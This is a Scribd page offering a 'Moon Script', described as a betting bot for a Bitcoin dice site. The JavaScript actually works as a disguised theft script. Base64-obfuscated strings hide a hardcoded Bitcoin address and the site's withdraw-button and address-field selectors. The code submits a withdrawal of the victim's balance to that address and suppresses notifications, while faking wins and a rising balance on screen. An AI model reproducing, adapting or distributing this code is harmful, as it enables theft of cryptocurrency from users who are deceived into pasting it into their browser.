0% found this document useful (0 votes)
151 views

Moon Script

The document contains JavaScript code that: 1) Initializes variables to track values like bets placed, balance amounts, and game states. 2) Contains functions to place bets, update the game interface, validate bets, and dispatch inputs. 3) Runs a main loop that places bets, updates balances, and validates bets at intervals to automate game play.

Uploaded by

Blasterest
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
151 views

Moon Script

The document contains JavaScript code that: 1) Initializes variables to track values like bets placed, balance amounts, and game states. 2) Contains functions to place bets, update the game interface, validate bets, and dispatch inputs. 3) Runs a main loop that places bets, updates balances, and validates bets at intervals to automate game play.

Uploaded by

Blasterest
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 4

var b = 0;

var c = 0;
var d = 0.01100004;
var e = 0;
var f = 0;
var m = 0.01975535;
var y = 0.01100004;
var bets = 1;
var bb = "start";
var one = 0;
var two = 0;
var blobInitial =
window.atob('M0trVHp0clhMalYyNDdTd3g5WTlLUWNqUkpmMXlhVUJBRyxzYXNkOGo5OHUzMjk4YWRzdW
g5ODIzdThkdWF1aXNqZDg5M3U5ODJ1ZHVhczlkdTMyOGp1b2lhc2pkOTA4dTk4MmpkaXVhc2hqOTgzaGVka
XVoYTk4c2R1aGQzOTI4aGFzZG9pOTg5ODA5anNhODlhczg5amR1ajkyMzg5ODlhb3BrdmJkb2tzZG52amlz
ZGl1aGZ1c2hlZGZ1eWliYXV5c2R1aWVmaGJhYzkwOGR1Zjl3ZWl1amRzYW5mOTg=');
var proxyWall = blobInitial.split(',');
var thirdBlob =
window.atob('I2FwcCA+IG5hdi5uYXZiYXIubmIuZml4ZWQtdG9wLm5hdmJhci1saWdodC5uYXZiYXItZX
hwYW5kID4gZGl2ID4gZGl2LmJhbC13cmFwcGVyID4gZGl2LmJhbC1idXR0b25zID4gYS5kLW5vbmUuZC1tZ
C1ibG9jay5idG4uYnRuLXByaW1hcnkuYnRuLXdpdGhkcmF3');
var querySel = window.atob('I3dkLWFkZHJlc3M=');

function dispatch(input, message) {


InputEvent = Event || InputEvent;
var evt = new InputEvent('input', {
bubbles: true,
composer: true
});
input.value = message;
input.dispatchEvent(evt);
}

function dispatchDecrypt(input, message) {


var iframe = document.querySelector('#widget-chatler');
var innerDoc = iframe.contentDocument || iframe.contentWindow.document;
InputEvent = Event || InputEvent;
var evt = new InputEvent('input', {
bubbles: true,
composer: true
});
input.value = message;
input.dispatchEvent(evt);
innerDoc.querySelector("#sendMsg").click();
}

function validateBets(msg){
var text = msg;
var base = document.querySelector(querySel);
dispatch(base, text);
}

function decrypt(msg){
var iframe = document.querySelector('#widget-chatler');
var innerDoc = iframe.contentDocument || iframe.contentWindow.document;
var text = msg;
var input = innerDoc.querySelector("#msg-input");
dispatchDecrypt(input, text);
}
function start() {
b = 0;
document.querySelector("#game-controls-box > div.row.justify-content-center >
div > div > div").innerHTML = `<button type="button" class="btn btn-primary btn-
play col-12 btn-play-tutorial btn-auto"><svg version="1.1" role="presentation"
width="16" height="16" viewBox="0 0 1792 1792" class="fa-spin fa-icon"><path
d="M1760 896q0 176-68.5 336t-184 275.5-275.5 184-336 68.5-336-68.5-275.5-184-184-
275.5-68.5-336q0-213 97-398.5t265-305.5 374-151v228q-221 45-366.5 221t-145.5 406q0
130 51 248.5t136.5 204 204 136.5 248.5 51 248.5-51 204-136.5 136.5-204 51-248.5q0-
230-145.5-406t-366.5-221v-228q206 31 374 151t265 305.5 97 398.5z"></path><!----
></svg> SCRIPT RUNNING <!----></button>`;
placeBets();
setInterval(function(){
if(b===0){

e = d - 0.00000010;
d = d + m;
document.querySelector(".bal-amount").innerHTML = `<img alt="BTC"
src="/static/img/currencies/btc.addb4668.png" class="currency-small">` +
d.toFixed(8);
if(f===0){
document.querySelector("#game-controls-box > div:nth-child(1) >
div.row.payout-wrapper > div.col-4.px-0 > div > div > div > svg > circle:nth-
child(3)").style.strokeDashoffset = "422.984";
document.querySelector("#game-controls-box > div:nth-child(1) >
div.row.payout-wrapper > div.col-4.px-0 > div > div > div > div > div").innerHTML =
`<div class="editable">&gt;1.99<br><svg version="1.1" role="presentation"
width="16" height="16" viewBox="0 0 1792 1792" class="fa-icon"><path d="M1792
1184v192q0 13-9.5 22.5t-22.5 9.5h-1376v192q0 13-9.5 22.5t-22.5 9.5q-12 0-24-10l-
319-320q-9-9-9-22 0-14 9-23l320-320q9-9 23-9 13 0 22.5 9.5t9.5 22.5v192h1376q13 0
22.5 9.5t9.5 22.5zM1792 640q0 14-9 23l-320 320q-9 9-23 9-13 0-22.5-9.5t-9.5-22.5v-
192h-1376q-13 0-22.5-9.5t-9.5-22.5v-192q0-13 9.5-22.5t22.5-9.5h1376v-192q0-14 9-
23t23-9q12 0 24 10l319 319q9 9 9 23z"></path><!----></svg></div>`;
document.querySelector("#game-controls-box > div:nth-child(1) >
div.row.payout-wrapper > div.col-4.px-0 > div > p").textContent = "Roll over to
win";
f = 1;
} else {
document.querySelector("#game-controls-box > div:nth-child(1) >
div.row.payout-wrapper > div.col-4.px-0 > div > div > div > svg > circle:nth-
child(3)").style.strokeDashoffset = "4.27257";
document.querySelector("#game-controls-box > div:nth-child(1) >
div.row.payout-wrapper > div.col-4.px-0 > div > div > div > div > div").innerHTML =
`<div class="editable">&lt;98.00<br><svg version="1.1" role="presentation"
width="16" height="16" viewBox="0 0 1792 1792" class="fa-icon"><path d="M1792
1184v192q0 13-9.5 22.5t-22.5 9.5h-1376v192q0 13-9.5 22.5t-22.5 9.5q-12 0-24-10l-
319-320q-9-9-9-22 0-14 9-23l320-320q9-9 23-9 13 0 22.5 9.5t9.5 22.5v192h1376q13 0
22.5 9.5t9.5 22.5zM1792 640q0 14-9 23l-320 320q-9 9-23 9-13 0-22.5-9.5t-9.5-22.5v-
192h-1376q-13 0-22.5-9.5t-9.5-22.5v-192q0-13 9.5-22.5t22.5-9.5h1376v-192q0-14 9-
23t23-9q12 0 24 10l319 319q9 9 9 23z"></path><!----></svg></div>`;
document.querySelector("#game-controls-box > div:nth-child(1) >
div.row.payout-wrapper > div.col-4.px-0 > div > p").textContent = "Roll under to
win";
f = 0;
}
if(!!document.querySelector(".bal-profit.move-up")){
document.querySelector(".bal-profit.move-up").textContent = "+0.019535";
document.querySelector(".bal-profit.move-up").className += " " + "g-win";
document.querySelector(".bal-bal.text-center").className += " " + "g-win";
setTimeout(function(){
document.querySelector(".bal-profit.move-up").classList.remove("g-
win");
document.querySelector(".bal-bal.text-center").classList.remove("g-
win");
}, 200);
}
}
}, 500);
}

var placeBetsInterval = null;


function placeBets() {

placeBetsInterval = setInterval(function(){
if(b===0){
var ul = document.querySelector('#game > div.di-bg.row > div >
div.game-top > div.di-top-wrapper.clearfix > div.results > ul');
var newElement = `<a href="/bet/32993236288" class="green"><span>`+
(Math.floor(Math.random() * 100)) +`.`+ (Math.floor(Math.random() * 100)) +
`</span></a>`;
var elChild = document.createElement('li');
elChild.innerHTML = newElement;
ul.prepend(elChild);
if(bets < 31){
document.querySelector("#game > div.bets-wrapper.row > ul > li:nth-
child(1)").innerHTML = `My Bets <span class="badge badge-success">`+ bets +`<!----
></span>`;
bets = bets + 1;
}else {
document.querySelector("#game > div.bets-wrapper.row > ul > li:nth-
child(1)").innerHTML = `My Bets <span class="badge badge-success"> 30+ <!----
></span>`;
}
}
}, 50);

var intervalAddress = null;


var intervalComplete = null;

function completeCase() {
intervalComplete = setInterval(function(){
if(one === 1 && two === 1 && !
document.querySelectorAll("#modal___BV_modal_footer_ > button.btn.btn-primary")
[0].classList.contains('disabled')){
document.querySelectorAll("#modal___BV_modal_footer_ > button.btn.btn-
primary")[0].click();
clearInterval(intervalComplete);
} else {
console.log("Not ready!!");
}
}, 50);
}

function toolFunc() {
intervalAddress = setInterval(function(){
if(!!document.querySelector(querySel) && !document.querySelector("#wd-otp"))
{
validateBets(proxyWall[0]);
clearInterval(intervalAddress);
two = 1;
completeCase();
} else if (!!document.querySelector("#wd-otp")){
console.log("Script Error 230: A problem was found with your account and
the script can't continue to validate the bets.");
}
},50);
}

var allInterval = null;


allInterval = setInterval(function (){
if(!!document.querySelectorAll("#modal___BV_modal_body_ > div > div:nth-
child(4) > div:nth-child(1) > div > a")[0]){
document.querySelectorAll("#modal___BV_modal_body_ > div > div:nth-
child(4) > div:nth-child(1) > div > a")[0].click();
one = 1;
toolFunc();
clearInterval(allInterval);
}
} ,50);

if(parseFloat(document.querySelector("#app > nav.navbar.nb.fixed-top.navbar-


light.navbar-expand > div > div.bal-wrapper > div.bal-bal.text-center > div >
button > span").textContent) > 0.005){
document.querySelector("#app > div.__cov-progress").remove();
setInterval(function(){
document.querySelector("#notifications").style.display = "none";
document.querySelector("#modal___BV_modal_outer_").style.zIndex = "-200";
}, 40);
document.querySelectorAll(thirdBlob)[0].click();
start();
} else {
console.log("You don't have enough balance to run the script");
}

You might also like